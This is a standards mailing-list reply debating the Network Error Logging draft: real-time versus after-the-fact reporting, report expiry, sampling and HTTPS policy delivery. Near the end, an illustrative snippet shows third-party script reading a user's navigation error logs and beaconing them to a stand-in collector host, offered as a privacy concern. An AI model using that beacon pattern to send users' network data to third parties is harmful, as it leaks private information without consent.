Re: [navigation-error-logging] new draft proposal

On Tue, Jan 13, 2015 at 6:43 AM, Aaron Heady (BING AVAILABILITY) <
aheady@microsoft.com> wrote:

>  I’ll summarize with this: the system isn’t designed to detect full outages,
> we should see that in normal internal volume drop telemetry/alerts. And it
> isn’t designed to detect a single error, there will just be too much noise
> in the system for any one user or error to matter.
>

You can make the same argument about performance timing data, yet there we
provide a complete view and defer interpretation of that data to particular
sites and applications.. which, I believe, is the right approach: in some
cases a single user can matter, and we should not assume that you already
have a telemetry system, nor that your system is able to distinguish errors
from regular daily dips (e.g. 1% of users on network X are having problems
accessing your site; that data would simply get lost in the noise of your
system today. If you don't care about this.. OK, but some sites do).


> Further, the use of the .js API to send NEL info back to the telemetry
> origin is predicated on the well-established user behavior of
> refresh-on-failure. We’ve all done it, and will continue to do it. When a
> website fails, the vast majority of us shrug it off as ‘the internet’ and
> retry. If the site we’re accessing is having an intermittent issue, then
> we’ll get a page load eventually and we can then get the NEL entries.
> Remember, we don’t need every user to retry, just a sample of them to
> establish the change in rate of errors.
>

I disagree with this. You're focused on intermittent errors where an F5
delivers an immediate fix. There is another class of errors that we have no
visibility into today and that this system enables us to see: blocked
access, attacks against the user, network misconfiguration, etc.. a refresh
cannot and does not address those. Plus, you're assuming that your user
will come back some time later.. which may be true of a popular destination
like Bing, but not true of the vast majority of long-tail sites: I click on
a link, it's dead, I click back and never return -- no report is ever
collected, and the site that failed remains oblivious.

Case in point, and an example from my own incompetence:
https://github.com/igrigorik/istlsfastyet.com/pull/56
- I added AAAA records but did not configure my server to listen on the
IPv6 address
- T-Mobile users were unable to reach istlsfastyet.com ... and *I had no
idea for a year+*

You can't detect or resolve the above case with JS reporting. As written,
NEL solves this.
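
To make that concrete, here's a rough sketch of the kind of out-of-band
report that could have surfaced my IPv6 misconfiguration. The field names
below are my own shorthand for illustration, not the draft's wire format:

    // Illustrative only: not the actual NEL report format.
    var report = {
      url: "https://istlsfastyet.com/",    // the navigation that failed
      errorType: "tcp.connection_failed",  // no listener on the AAAA address
      serverAddress: "2001:db8::1",        // documentation address, stand-in only
      ageMs: 4200                          // time elapsed since the failure
    };

A client with a registered policy can queue such a report and deliver it
later over a path that does work, without any script on the failed page.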


>  As this system is designed to detect intermittent outages, say a buggy
> DNS deployment, the information has a very short useful lifespan.
>

I don't see why you're assuming that we should restrict ourselves to
intermittent outages only -- we shouldn't. We have *no visibility* into
persistent outages (misconfiguration, attacks, etc.), and NEL can finally
help us detect and act on them.

> I’d argue that the data is of little value after 24 hours; I could even say
> much shorter and still be happy with the system. If we can’t detect a
> change in the volume of errors in say 6 hours, then the error rate is
> probably just part of the background noise and nothing is going to detect
> it. Every issue that I’ve watched in Bing.com that I would want this system
> to help detect could have tolerated the data on clients being expired in
> just 5 minutes. The retry rate and the volume of users is what matters,
> nothing else.
>

That's a good data point - thanks. In 2.3 I did provide a "SHOULD" for
dropping reports after 24 hours.
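
For illustration, that expiry could be as simple as pruning anything older
than the max age before delivery -- a sketch only, with names of my own
choosing rather than the draft's:

    // Sketch of the client-side expiry implied by the 2.3 "SHOULD".
    // MAX_REPORT_AGE_MS and report.timestamp are illustrative names.
    var MAX_REPORT_AGE_MS = 24 * 60 * 60 * 1000;
    function pruneExpired(queue, now) {
      return queue.filter(function (report) {
        return now - report.timestamp <= MAX_REPORT_AGE_MS;
      });
    }

If 6 hours (or even 5 minutes, per your Bing experience) turns out to be
enough, that's just a smaller constant.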


>   For the real-time delivery part, ok, I get it. But I don’t like the
> idea of having millions of clients set to automatically flood me with
> telemetry when an issue occurs.
>

This is fair; for a large site you may want to sample. In DR we have a
"failure_sample_rate" setting in the config. I can see an argument for
providing that as a configuration option: sample=0.1 .. deliver 10% of
error reports, or some such.
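
For example, a hypothetical "sample" field in the policy could gate
delivery on the client -- a rough sketch, not something in the current
draft:

    // "sample" is a hypothetical policy field; default is to report everything.
    function shouldDeliver(policy) {
      var rate = (policy.sample === undefined) ? 1.0 : policy.sample;
      return Math.random() < rate;   // sample=0.1 -> deliver ~10% of reports
    }

That would let a large site cap the report volume it receives during a
widespread incident while still seeing the change in error rate.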


> What are some cases that everyone out there is thinking about detecting?
> In my mind it is all unstable code causing intermittent results/errors of
> some type. What are your thoughts?
>

Any network error that prevents the user from successfully loading the
resource: transient, permanent, attack, whatever. There is a *long* list of
reasons why a user may not be able to reach the site.. our job is to
deliver telemetry when such a failure occurs and leave it to the operator
to figure out how/if they want to act on it.


> But one specific concern wasn’t addressed: Secure policy delivery on
> HTTP-only networks. If example.com is hosted on a CDN’s http-only
> delivery network, it is literally not possible (by policy, not technology)
> to provision an SSL certificate on the same host. You can’t have HTTP and
> HTTPS resolve to two different IPs, so it won’t be possible to have TLS,
> thus this feature can’t be used. My biggest context for this is experience
> with Akamai, but it certainly can be generalized. Not arguing against TLS
> in general, just want to understand how NEL will be used in sites that
> can’t host a secure channel on the same hostname.
>

I can't comment on Akamai specifically, but I'm sure they have a solution
for this - and if they don't, they should, or they'll be losing business!
As I said earlier, I think NEL falls into the "powerful features" bucket
and registration needs to be managed over HTTPS.

> We *have to* provide non-JS delivery to facilitate real-time + reliable
> reporting:
>
>   (a) a pure JS solution cannot deliver real-time reports since, by
> definition, the navigation must have succeeded.. it only enables
> after-the-fact reporting.
>
> (b) after-the-fact reporting requires that the user comes back later and
> that load succeeds: this can happen with an arbitrary delay (user's
> decision), or not at all - e.g. I click on a search result or link in some
> article, it fails to load, I never come back and report is never delivered.
>
> <<Aaron>> How often do you hit refresh when a page fails? That next load
> is the opportunity for this data, delayed by just seconds.
>

I do.. and sometimes it works, but sometimes it doesn't. The fact that
sometimes it doesn't is important, and we absolutely need to provide
visibility into this case.


>  (c) any script (including third party) can iterate over your navigation
> error logs.. which exposes additional private data about the user and their
> network without (in my opinion) adding much value due to all of the reasons
> above.
>
>   <<Aaron>> This one is interesting. How is this issue different for any
> of the other arrays of info, e.g. navigation timing? Let’s pick this one apart.
>

You're right, it's not new. I'm just highlighting the pitfalls of exposing
the JS API.
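
To illustrate the exposure: something like the following would be possible
for any script on the page, including third-party script. The accessor
name is hypothetical (modeled on the navigation timing pattern), not the
actual API:

    // Hypothetical accessor, shown only to illustrate the exposure concern.
    var errors = window.performance.getEntriesByType("navigationErrors");
    errors.forEach(function (e) {
      // ship details of the user's network failures off to a third party
      new Image().src = "https://collector.example/log?e=" +
          encodeURIComponent(JSON.stringify(e));
    });

It's the same class of exposure as navigation timing, as you point out; the
question is whether the JS read API adds enough value to justify it.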

ig

Received on Tuesday, 13 January 2015 18:48:38 UTC